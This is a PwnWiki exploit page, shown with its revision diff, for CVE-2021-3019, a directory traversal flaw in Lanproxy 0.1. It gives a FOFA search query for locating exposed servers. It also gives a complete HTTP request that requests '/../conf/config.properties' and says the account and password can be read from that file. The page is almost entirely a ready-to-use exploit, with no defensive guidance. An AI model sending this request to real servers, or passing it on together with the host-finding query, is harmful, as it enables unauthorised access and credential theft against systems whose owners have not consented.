Difference between revisions of "CVE-2021-3019 Lanproxy 目錄遍歷漏洞"

From PwnWiki
(Created page with "<languages /> <translate> ==漏洞影響== </translate> <pre> Lanproxy 0.1 </pre> ==FOFA== <pre> header= "Server: LPS-0.1" </pre> <translate> 發送如下請求: </transl...")
 
(Marked this version for translation)
 
Line 1: Line 1:
 
<languages  />
 
<languages  />
 
<translate>
 
<translate>
==漏洞影響==
+
==漏洞影響== <!--T:1-->
 
</translate>
 
</translate>
 
<pre>
 
<pre>
Line 13: Line 13:
  
 
<translate>
 
<translate>
 +
<!--T:2-->
 
發送如下請求:
 
發送如下請求:
 
</translate>
 
</translate>
Line 28: Line 29:
  
 
<translate>
 
<translate>
 +
<!--T:3-->
 
成功在配置文件中讀取 賬號密碼。
 
成功在配置文件中讀取 賬號密碼。
 
</translate>
 
</translate>

Latest revision as of 10:27, 23 March 2021

Other languages:
Bahasa Indonesia • ‎Chinese • ‎español • ‎português • ‎русский

漏洞影響

Lanproxy 0.1

FOFA

header= "Server: LPS-0.1"

發送如下請求:

GET /../conf/config.properties HTTP/1.1
Host: xxx.xxx.xxx.xxx
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close

成功在配置文件中讀取 賬號密碼。